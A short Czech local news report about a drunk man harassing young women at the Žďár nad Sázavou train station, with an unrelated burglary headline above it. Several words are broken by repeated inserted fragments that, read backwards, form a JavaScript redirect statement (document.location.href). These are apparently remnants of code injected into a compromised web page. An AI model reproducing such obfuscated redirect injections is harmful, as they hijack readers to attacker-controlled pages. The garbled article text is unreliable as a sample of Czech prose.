Rainbow page separator

Opilý muž obtěžoval slečny, nadýchal více než tři promile

Pátek, 10. září 2021

Zloděj ukradl z rodinného domku uniformu, pálenku i hodiny

Žďár nad Sázavou / Více než tři promile alkoholu v dechu měl muž, k němuž ve čtvrtek 2. září před šestnác[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou hodinou vyjížděli žďárští policisté do Chelčického ulice.
„Policisté byli přivoláni k vlakovému nádraží, kde se nacházel opilý muž, který obtěžoval okolí. Slovně napadal dívky, po kterých požadoval půjčení telefonu, a choval se vůči nim agresivně. Policisté ho zajistili a při dechové zkoušce mu naměřili hodnotu 3,16 promile alkoholu,“ popsala policejní mluvčí Jana Kroutilová.
Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tože pětapadesátiletý opilec byl i nadále arogantní a jeho agresivita se stupňovala, policisté ho obratem eskor[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovali do jihlavské protialkoholní záchytné stanice k vystřízlivění. „Muž je podezřelý ze spáchání přestupku proti občanskému soužití, který policisté šetří,“ doplnila mluvčí.